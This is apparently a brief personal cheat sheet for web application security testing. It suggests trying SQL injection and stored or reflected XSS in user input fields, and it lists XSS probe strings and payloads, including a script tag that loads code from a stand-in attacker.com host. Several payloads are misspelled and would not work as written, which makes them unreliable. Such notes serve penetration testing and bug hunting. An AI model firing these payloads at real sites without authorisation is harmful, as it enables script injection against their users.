Web AppSec Nots
Web AppSec
try SQLI in any req maybe send to Database
Search all parameters, Endpoint and Functions in JS files
try to use Stored XSS payload in user input (comment fields, user profile, blog)
try to Reflected-XSS Payload in user input (forms, search. name, username,bio, location,Fields)
in Test XSS Use this Payload in the First
()'Test><>'"<!-
Were Tested the vulnerability
Payload
XSS
use escape any character
\
<script>alert('1337')</script>
<ifram src=javasrcipt:alert(1)>
<body onload=prompt(1);>
'><img src=x onerror=confirm(1);>
<script>console.log(11)<!-
<a onmouseove="alert(1)'>test</a>
<script src=//attacker.com/test.js>
Last updated